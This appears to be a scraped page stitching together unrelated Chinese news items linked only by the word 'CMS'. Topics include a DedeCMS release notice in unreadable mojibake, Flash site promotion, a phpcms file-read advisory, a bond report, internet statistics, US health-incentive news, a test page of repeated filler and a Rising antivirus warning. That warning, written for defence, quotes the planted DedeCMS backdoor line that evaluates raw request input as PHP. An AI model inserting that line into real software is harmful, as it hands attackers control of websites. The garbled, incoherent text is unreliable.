text-align: left; line-height: 180%; font-size: 14px;”>
绔欓暱涔嬪锛坈hinaz.com锛?鏈?鏃ユ秷鎭?/strong>锛氳嚜鍥藉唴鐭ュ悕鐨勭綉绔欏唴瀹圭鐞嗙郴缁烡edeCMS v5.7 beta鐗?鏈?1鏃ュ彂甯冧互鏉ワ紝缁忚繃涓ゅ懆绱у紶鐨勬祴璇曞拰璋冩暣銆傜粐姊MS浜庢槰鏃ヤ笅鍗堝彂甯僁eDeCMS 5.7姝e紡鐗堛€?/p>
鎹簡瑙o紝鏂扮増鏈敼杩涚紦瀛樺鐞嗭紝鏇村ソ鐨勬弧瓒充腑灏忓瀷缃戠珯鐨勬€ц兘瑕佹眰锛屾澶栭棶绛旀ā鍧椼€佸垎璇嶇粍浠躲€佸叏鏂囨绱㈢瓑閮借繘琛屼簡鏀硅繘鍗囩骇銆?/p>
锛?.7鐗堟湰棣栭〉鎴浘-鐐瑰嚮鏌ョ湅澶у浘锛?/p>
锛?.7鐗堟湰鏂囩珷缂栬緫椤垫埅鍥?鐐瑰嚮鏌ョ湅澶у浘锛?/p>
DedeCMS v5.7涓昏鐨勬柊澧炰綋楠岋細
1銆佹敮鎸丮ySQLi骞朵笖璋冩暣缂撳瓨澶勭悊锛屾€ц兘鎻愬崌
V5.7鏂扮増鏈粯璁ゅ紑鍙戞椂锛屾祴璇曟暟鎹?0W锛岃繖涓閲忓浜庝腑灏忓瀷绔欓暱宸茬粡瓒充互锛屽綋鐒朵笉鎺掗櫎鏈夌櫨涓囥€佸崈涓囩骇鏁版嵁鐨勭敤鎴烽渶姹傦紝杩欓儴鍒嗙殑鐢ㄦ埛涔熸湁涓撻棬鐨勪紭鍖栨柟妗堛€?/p>
2銆佸畬缇庡吋瀹筆HP5.3/5.2+/4鐗堟湰
PHP瀹樻柟宸茬粡鍙戝嚭鎵€鏈夌▼搴忚浆绉诲埌PHP5.3鐨勫彿鍙紝浣嗘槸瀵逛簬寰堝涓绘満鏈嶅姟鍟嗭紝寰堝鎶€鏈憳杩樻病鏈夐€傚簲鏂扮増鏈甫鏉ョ殑鏀瑰彉锛岃繖閲屾垜浠畬缇庡吋瀹瑰悇涓狿HP涓绘祦鐗堟湰銆?/p>
3銆佹柊鐗堝鏈嶄腑蹇冨府浣犺В鍐崇枒闂紝闂瓟妯″潡鍚屾鍗囩骇
寰堝浜烘姳鎬ㄨ鍧涢棶棰樹笉鑳藉強鏃惰В鍐筹紝鍏跺疄寰堝闂鏄笉鎰块噸澶嶈В鍐筹紝浣嗘嫎娉ヤ簬璁哄潧杩欑浠ョ亴姘村ū涔愪负涓荤殑鍦版柟寰堥毦褰㈡垚鎶€鏈皵姘涳紝瀹樻柟閲囩敤鏂扮増闂瓟妯″潡閲嶆瀯瀹㈡湇涓績锛岃澶у鐨勭枒闂兘澶熸洿蹇€佹洿鏂逛究鐨勫緱寰楀埌瑙e喅銆?/p>
4銆佸叏鏂板垎璇嶇粍浠讹紝璁╁垎璇嶆洿鍑嗙‘銆佹洿楂樻晥銆佹洿蹇€?/strong>
鏂扮増鏈郴缁熼噰鐢ㄥ叏鏂板垎璇嶇粍浠讹紝璇ュ垎璇嶉噰鐢≒HP璇█杩涜鏋舵瀯锛屽垎璇嶉€熷害蹇苟涓旀墽琛屾晥鐜囬珮锛屽綋鐒跺垎璇嶈瘝搴撲篃鏀寔鑷畾涔夛紝鍗犵敤鍐呭瓨灏忕瓑浼樼偣锛屼笉淇″幓璇昏浠g爜鍚с€?/p>
5銆丼phinx鍏ㄦ枃妫€绱㈡敮鎸?/strong>
涓轰簡婊¤冻閮ㄥ垎鍟嗕笟鐢ㄦ埛鐨勯渶姹傦紝鏂扮増鏈绱㈠皢鏀寔Sphinx鍏ㄦ枃妫€绱㈠紩鎿庯紝褰撶劧鎴戜滑涔熼厤鏈夎缁嗙殑璇存槑鏂囨。锛屽叏鏂囨绱笉鍐嶅洶闅俱€?/p>
6銆佹ā鍧桵VC鏋舵瀯
绯荤粺闂瓟妯″潡鏈閲囩敤MVC杩涜浜嗛噸鏋勶紝鎺ヤ笅鏉ユ垜浠細瀵规暣涓郴缁熼€愭杩涜閲嶆瀯锛屽湪淇濊瘉绯荤粺鏄撶敤鎬х殑鍚屾椂閫愭鍩瑰吇鎴戜滑鑷繁鐨勬妧鏈紑鍙戝悎浣滆仈鐩燂紝鐩镐俊鏈潵鐨勭粐姊︿細鏇村紑鏀俱€?/p>
鏇村鏇存柊鍐呭璇锋煡鐪嬶細http://down.chinaz.com/soft/29354.htm
DedeCms5.7鐗堟湰涓嬭浇閾炬帴锛?/strong>
DedeCms v5.7 GBK 涓嬭浇鍦板潃锛?a target=”_blank” href=”http://down.chinaz.com/soft/29269.htm”>http://down.chinaz.com/soft/29269.htm
DedeCms v5.7 UTF8 涓嬭浇鍦板潃锛?a target=”_blank” href=”http://down.chinaz.com/soft/29354.htm”>http://down.chinaz.com/soft/29354.htm
文 | 荣宾(八维广告学院教师)
众所周知,FlashCMS互动全站一向是高技术含量的象征,是各大时尚品牌热衷的表现形式,它不仅精美、动感、个性、时尚,而且全部由FCMS管理后台进行维护更新,它的出现颠覆了整个互联网的传统建站模式,使得企业、公司、工作室、个人有了更贴身的选择。
在八维广告学院,我一直致力于研究用户体验极佳的FlashCMS互动全站miniSite及手机UI界面设计。成为一个伟大的Flash互动设计师是我一生的梦想,这个梦想源自于在天津美院上大学二年级时,无意中看到的一个韩国Flash创意全站,我被其中震撼的创意画面吸引住了。后于2007年去日本东京都涉谷区进修Flash动画学及日语,在一家叫做“Transcosmos”的日本公司做FlashCMS互动全站,后回国创立博户实验室及荣先生官网(FlashCMS互动全站)。
从那时起,我就想将FlashCMS互动全站的设计经验与更多的同仁分享,一个偶然的机会,我来到了八维广告学院这个很好的传播平台,有了八维星空,更希望把荣先生的设计经验与更多有兴趣的八维学子分享。
八维的广大学子,是否梦想过在全球任何一台联网的电脑上打www.“你的名字”.com访问到你的个人官网,尤其是FlashCMS互动全站?
你只懂得用博客、相册包装自己?
你还没有拥有一个属于自己的专业网站?
你还停留在毫无个性、单调乏味的静态网站时代?
那么,你还等什么呢?
FlashCMS互动全站在知名品牌中的应用:如图:
一、汽车Flash互动全站
二、房产Flash互动全站:
下面我们先来看一下Flash的特点:
1.FLASH本身导出的文件小,但表现的动画角色非常形象生动,适合网络传输;
2.FLASH的AS3代码非常强大,交互性强,并能与其它程序语言灵活读取;
3.适用范围广,比如网站、广告、游戏、程序、多媒体演示等,应用实体比较多,如手机游戏、触摸屏广告、电视媒体等;
4.Flash网站比较生动,其互动性能将是普通网站无法比拟的。
那FlashCMS互动全站有什么特点呢?首先,肯定就是只要你有灵感、创意,做出来的东西就会酷、帅,更具活力,随意性大。其次,因为其动画的特性,配合AS程序,打破了让人习惯了静止的网页页面的格局,让人眼前一亮。再次,如果与传统网站比较,Flash用做推广品牌形象网站以及品牌延升的新产品展示、宣传,您将会获得更多、更好的效果以及经济收益。
可能有人会说:“Flash网站不能由后台控制。”
答:没错,我们通常在网络所见的国内Flash网站大多都不由后台控制,这将意味着我们的客户不能随意修改、添加或删除网站中的所有内容。
但大多数并非代表全部。从一开始我们就为此而努力、不断尝试,随着我们对Flash Actionscript3.0 以及Flxe的钻研,使程序员能够更轻易的与XML以及其他语言沟通,亦使我们很早以前就能为所有Flash网站提供智能后台的服务。
与此同时,我们能大大提升工作效率从而为客户降低投入成本和网站制作所耗费的时间。
例如,在一些Flash技术发展到一定程度的国家,他们Flash网站大多都能够使用后台控制。
可能有人会说:“Flash网站打开与运行速度都比较慢。”
答:大家知道,我们浏览一个网站,速度快慢将决定我们浏览的热情度。Flash网站无论是语言技术还是设计标准都比传统网站高很多,而大多未经过程序和图片压缩优化的Flash网站打开速度是非常慢的,所以在我们的印象中Flash网站就是打开速度比较慢。其实并非如此,Flash中也拥有十分强悍的压缩技术,网站快慢将取决于设计师与程序员是否能负担起优化网站之责任。
例如:我们若打开一个Flash动画,而内嵌有10张1MB图片(经过优化),与同样一个传统式网站比,我们可以用我们的专业知识告诉您,Flash会快些!
可能还有人会说:“Flash网站不易网站的推广。”
答:Flash网站与普通网站一样都是网站,Flash网站必须依赖IE(Internet Explorer)或其他浏览器才能在网络传播,而我们要登陆Flash网站跟其他传统网站一样,打开浏览器、输入网址……我们想说的是,普通网站能做到的,Flash网站都可以,关键在于设计师是否有耐性去做好他。
让我们再举例说明,通常每个网站都会含有Html(超文本标记语言)代码,而Html代码有我们熟悉的Title(标题)标签,此标签在网站搜索推广中起着十分关键性的作用,难道Flash网站没有Title(标题)吗?若您的Flash网站能再加上我们的独特SEO(搜索优化技术)后,效果将更加显著!
运动Flash互动全站:
当然Flash的优点很多,对于FlashCMS互动全站而言,我们坚信以后将是一个趋势。越早进入,越能获得意想不到的效果。
window.HLBath=1;
近期phpcms v9 被发现一个任意文件读取漏洞,Phpcms 是目前互联网上使用比较广泛的web cms。攻击者可以通过或者后台登录之后读取任意文件包括数据库配置文件,可导致入侵者获得数据库权限,并利用数据库提权进一步获得系统权限,并带来服务器系统的安全隐患。杭州安恒信息技术有限公司安全团队于12月20日将相关漏洞信息在第一时间以报告形式发送给中国国家信息安全漏洞。针对该漏洞可能已对部分用户造成严重损失,安恒信息已经在第一时间对明御WEB应用防火墙进行升级,可有效抵御该漏洞的侵害。
安恒信息作为中国国家信息安全漏洞库的成员单位(http://www.cnnvd.org.cn/coopration/cooprationorg/p/2/)以及良好的技术支持团队,是业界领先的应用安全及数据库安全整体解决方案提供商,专注于应用安全前沿趋势的研究和分析。其中安恒信息的“Web应用防火墙”是结合多年应用安全的攻防理论和应急响应实践经验积累的基础上自主研发完成,满足各类法律法规如PCI、等级保护、企业内部控制规范等要求,以国内首创的全透明直连部署模式,全面支持HTTPS,在提供WEB应用实时深度防御的同时实现WEB应用加速、敏感信息泄露防护及网页防篡改,为Web应用提供全方位的防护解决方案。该产品致力于解决应用及业务逻辑层面的安全问题,广泛适用于“金融、运营商、政府、公安、教育、能源、税务、工商、社保、卫生、电子商务”等所有涉及WEB应用的各个行业。部署安恒的WAF产品,可以帮助用户解决目前所面临的各类网站安全问题,如:注入攻击、跨站脚本攻击(钓鱼攻击)、恶意编码(网页木马)、缓冲区溢出、信息泄露、应用层DOS/DDOS攻击等等。
安全提醒:
针对安恒信息提供的漏洞信息,漏洞预警已经通报中国国家信息安全漏洞库,并取得高度重视。在此,安恒信息专家提醒广大用户如使用phpcms发现问题,可直接咨询安恒信息的技术专家,尽可能避免因安全风险造成的损失。软件厂家做好软件安全控制,通过自身或第三方安全厂家进行软件安全漏洞检测,避免给用户造成安全威胁。
漏洞详细信息介绍:
受影响的程序版本:
PHPCMS V9.1.8 存在 任意文件读取漏洞
综述:
Phpcms 是目前互联网上使用比较广泛的web cms,近期phpcms v9 被发现一个任意文件读取漏洞.攻击者可以通过或者后台登录之后读取 任意文件 包括数据库配置文件.可导致入侵者获得数据库权限 并利用数据库提权进一步获得系统权限.因此需要引起相关的用户重视
分析:
Phpcms 在登录后台后调用文件过程未做过滤导致可以读取其他文件泄漏相关文件
并带来服务器系统的安全隐患
CMS Energy周一上午发行1.8亿美元10年期WNG优先级债券,但最终在下午提早收场,因结算水准显然达不到发行方的期望.
这笔发行方s/s/s评级为Ba1/BB+/BB+的交易在今日上午宣布,主动簿记行为BNP/MUS/RBS/STI/UBS,协理行为SMBC/Huntington.条件中包括到期前长达三个月的MWC,之後可平价赎回.此次募集资金用于该公司2013年到期的1.5亿美元优先浮息债的再融资等.
有传言称CMS这笔发债利率在公债收益率加码250基点左右.
一些市场消息称,发债规模过小(极度缺乏流动性)是一个很大的障碍.”我们听说,一些大买家如果参与这种非指标类的小规模高收益发债,必须要有极大的折让.在目前市场十分看重流动性.”一消息人士说.(完)
CNNIC在京发布了《第27次中国互联网络发展状况统计报告》,《报告》显示,截至2010年12月底,我国网民规模达到4.57亿,较2009年底增加7330万人。2010年,我国网民规模继续稳步增长,网民总数达到4.57亿,互联网普及率攀升至34.3%,较2009年底提高5.4个百分点。全年新增网民7330万,年增幅19.1%。截至2010年底,我国网民规模已占全球网民总数的23.2%,亚洲网民总数的55.4%。
截至2010年12月,中国的网站数,即域名注册者在中国境内的网站数(包括在境内接入和境外接入)为191万个,网页数和网页字节等互联网资源数在大幅度增长。网页的规模反映了互联网的内容丰富程度,自2003年开始,中国的网页规模基本保持翻番增长,2010年网页数量达到600亿个,年增长率78.6%。这也标志着中国网站的发展相比之前更加迅猛,与此同时,网站解决方案提供商的需求量也越来越大。
正是由于网站建设的需求不停的扩张,网站解决方案提供商在各地遍地开花,全国的网站建设提供商统一起来成千上万,而实力比较雄厚,拥有智能建站系统(CMS)自主知识产权的厂家却只有为数不多的数十家。这其中,SiteServer CMS做为一款拥有自主产权,功能强大,高端实用的智能建站内容管理系统,深受众多政府机关和集团企业的青睐,包括像联想集团,当当网,麦考林,国家农业部等机构都选择使用SiteServer的产品和服务。
SiteServer做为国内高端优秀的网站软件厂商,旗下拥有多款网站产品,如SiteServer CMS网站内容管理系统,SiteServer Space个人空间系统,SiteServer Ask问答系统等,这些产品相辅相承,从不同层面满足用户对网站的特殊需求。用户既可以用SiteServer CMS来搭建一个功能强大的网站,又可以利用SiteServer Space建设成一个博客集群的互动式交流网站,还能使用SiteServer Ask问答系统成立一个会员间互帮互助、自由问答的知道平台。通过SiteServer系列产品的自由搭配组合,用户非常方便的造就出一个功能强大,集内容发布,会员管理,个人空间,问答平台等多项功能于的大型多功能互动式网站平台。
目前,中国网民规模与普及率宏观经济形势持续向好,网络基础建设务实推进,移动互联网加快发展,网络安全保障体系更加完善,农村信息化使用深度增强等,共同推动了2010年我国网民规模和普及率的稳步提升。而2011年至以后的几年,仍然是网站的需求多发期,像SiteServer这样的优秀网站软件厂商的进步与成长,在推动互联网网站发展上起了非常重要的推波助澜作用。
作者:佚名
(责任编辑:Newshoo)
【HC3i独家翻译】据美国医疗保险及医疗补助中心(CMS)表示,EHR医疗保险激励计划的第一笔奖励金已于上周发出。那些已经成功证明符合有意义使用和所有其他方案的要求的从业者,可以期望很快得到他们的2011年奖金。
参与EHR医疗保险激励计划的符合条件的专业人士最迟需要在明年前2个月内提交全部医疗保险所允许的费用,他们将获得总费用的75%作为奖金。以2011年允许收费的上限24 000美元为准,一个符合条件的专业人士第一年参加激励计划的最高奖金可达18000美元。CMS表示,在达到医疗保险允许的24000美元的门槛前,奖励款将不会发放给符合条件的专业人士。对符合条件的医院和紧急中心医院的奖励款项是基于多项因素的,以200万美元为基础付款额。
参与者将通过电子转帐或支票等与获取医疗保险付款同样的方式获得他们的EHR激励计划奖金。支付给医疗保险机构的款项将发给在EHR激励计划注册时选定的纳税人识别号码(TIN)。
CMS表示,“医疗保险行政承包商(MAC)、运营和财政中介机构将不会负担这些付款。 CMS正与付款文件发展承包商安排这些款项。”目前,已有超过8千3百万美元的医疗奖励金发放给参与EHR激励计划的符合条件的专业人士和医院。
TOM首页 > 乔丹体育 > 测试目录 > 正文TOM乔丹体育sports.tom.com
cmsmini推送到篮球大本营
收藏
复制链接
打印来源:TOM 体育
时间:2011-03-22 11:31
cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营cmsmini推送到篮球大本营
(责编:张孝永TN1000)
下一篇 >>
返回首页
新闻大视野相关新闻
·post体育图片 (2011年05月30日)
·游泳世锦赛举行公开水域测试赛 一切设施全面到位 (2011年06月20日)
·NBL体测为CBA试水 宫鲁鸣:折返跑测试效法火箭队 (2011年05月31日)
·天津籍裁判执法亚俱杯 代表中国高要求测试最高分 (2011年06月24日)
·测试图片1 (2011年06月15日)
·测试推送卓望post (2011年06月07日)
·测试推送到卓望post文章2(测试勿用) (2011年06月07日)
·测试mini (2011年05月18日)
·asdfas (2011年05月18日)
·post有版权 (2011年05月16日)
有站长在微博称,百度公司在推出百度影音beta版之后,将可能再推出一款专门的CMS系统,很可能采用Qvod快播的运维合作模式。
Web开发网站长谷汶锴在其微博报料,称百度或在近期面向站长发布影视建站系统——光线CMS,为刚发布的百度影音安装量与播放量铺路。并且提供了在线视频播放协议接口,支持更多的CMS与影视资源的导入。而这一切与业内知名的播放软件快播Qvod的模式很相似,同时这一领域也有迅雷Gvod。
谷汶锴的微博发言 http://t.sina.com.cn/wensky
站长之家编辑随后访问了百度影音官方网站,发现在其官网右侧的友情链接区域有一个CMS专区,点击入内提示“光线CMS影视系统(免费开源/一键采集),系统维护中…”。
Gxcms的IP地址与百度影音的下载地址相吻合
通过IP地址对比,发现gxcms.com所指向的IP与百度影音官方下载的IP地址相吻合,因此相信百度“光线CMS”并非空穴来风。
在下载百度影音后,关闭客户端,在系统进程中仍然会保留一个百度影音的P2P进程,与Qvod的模式极为相似,这也佐证了百度推出CMS的必须性。
在百度影音推出后,业内人士纷纷做出评论,普遍观点认为百度从与奇虎360的争斗,以及3Q大战中吸取了教训,也认识到了客户端产业链的重要性,因此,光线CMS的出炉也是必然的结果。
而从百度影音官方刻意流露出的CMS信息来看,光线CMS将可能在未来一周内宣布推出。
(责任编辑:孔胜)
随着科技的进步,互联网的发展以其特有的速度让人们看到时代的不停变迁。从最原始的局域网获取少量信息到现在只需一台手机就能轻松实现的网络生活,人们已经越来越离不开互联网。而互联网一直未能离开的,就是网站。
不管是私营企业,还是政府机关,或是新闻机构,都会建立自己的官方网站用以展示自己的形象,促进网民对其的认知和理解。网站是企业以及政府各机构展示自身形象、发布信息的网络平台,承担着在互联网瀚海中对外宣传的重要任务。随着互联网的迅速发展,网民的急剧增加,各企业及政府机构都建立起了自己的网上平台,希望通过互联网让更多的人熟知自己。而网站建设的技术,也在网络突飞猛进的发展中,有着日新月异的变化。
早期的网站建设技术,是技术人员运用一般的网页制作软件,通过代码编程,把一些平面页面效果转化成网页,然后把各个相关网页通过链接互相连通,再通过链接规整连接成一个整站。用这种方法实现网站,一方面制作周期长,费用高,另一方面其更新及修改网站内容均需专业人员进行代码修改,维护困难。于是很多企业为了避免麻烦节省开支,经常不更新其网站内容。如此一来,失去了网站建设的意义,用户体验也很差。
之后,为了规避问题,使网站管理人员方便维护,网站建设技术针对网站的某一功能采用一些数据库管理模块,对个别的功能模板进行后台管理。采用这种方式建设的网站,在一定程度上摆脱了早年间网站内容更新困难的缺点。但这也仅仅适用于更新维护频繁,且对网站有独特需要的大型企业网站单独做需求开发,而且开发的价格一般的中小企业也难以承受。
随着技术的发展,也随着快速制作网站并且维护方便的需求增加,从2003年开始,涌现出一批提出可以智能建站的CMS(内容管理系统)概念并开发CMS系统的公司,如SiteServer CMS系统,phpnuke等。CMS系统的应运而生,彻底打破了传统网站建设的模式,成为企业及政府网站建设的新宠。采用CMS系统进行网站建设,建设及维护人员不用精通代码就可以很好的进行应用。通过CMS系统不仅更新维护方便,还可以自定义网站的框架内容,并且能够随时升级网站功能。
以国内知名内容管理系统SiteServer CMS为例,它能够支撑网站群的统一管理,支持父站点、子站点的创建与统一管理,能够对每个站点设置不同的顶级域名,一个站点内支持使用二级域名,站点间信息转移与同步,同时系统支持精确到栏目的权限分配及协作机制,解决了网站安全与权限的问题。
而且,每个网站,不管大小,内容多少,关系多么复杂,都是由模板、栏目、内容三者构成的。模板决定了网站的显示效果,栏目控制了网站的层次,内容就是网站发布出来的信息。 用SiteServer CMS 建网站可以自定义各式各样模板,并且可以给不同栏目匹配不同的模板,形成表现形式多样的网站。 SiteServer CMS 的这种方便的管理思想决定了用其建站非常方便,大概分为五步:设计网站样式,切图(将网站样式做成静态页),制作模板,匹配模板,生成网站。采用一个像SiteServer CMS这样功能强大,操作方便的内容管理系统作为网站的后台,对网站的发展以及后期的运营维护工作,都会起到很大的促进作用。
瑞星公司今日对外发布紧急警示:国内知名的PHP开源网站管理系统——织梦CMS(DedeCms)v5.7 sp1版本被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。据CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。瑞星公司特此紧急提醒使用该系统的网站管理员,使用瑞星网站密码安全检测系统查找后门并及时进行封堵。
据瑞星专家介绍,织梦CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后门代码“@eval(file_get_contents(‘php://input’));”。通过利用这个后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限。
CMS中被植入的后门代码
在黑客攻陷网站后,便可以直接访问服务器上的文件、数据库等信息。目前我国有大量网站采用该系统,此后门或将导致大量用户的信息泄露,造成极为严重的影响。
针对此后门事件,瑞星对其网站密码安全检测系统(http://union.rising.com.cn/)进行了紧急升级,各位网管可使用该系统对自己的网站进行安全扫描,并免费获得瑞星针对此后门的修补建议。 
【责任编辑 周达洋】
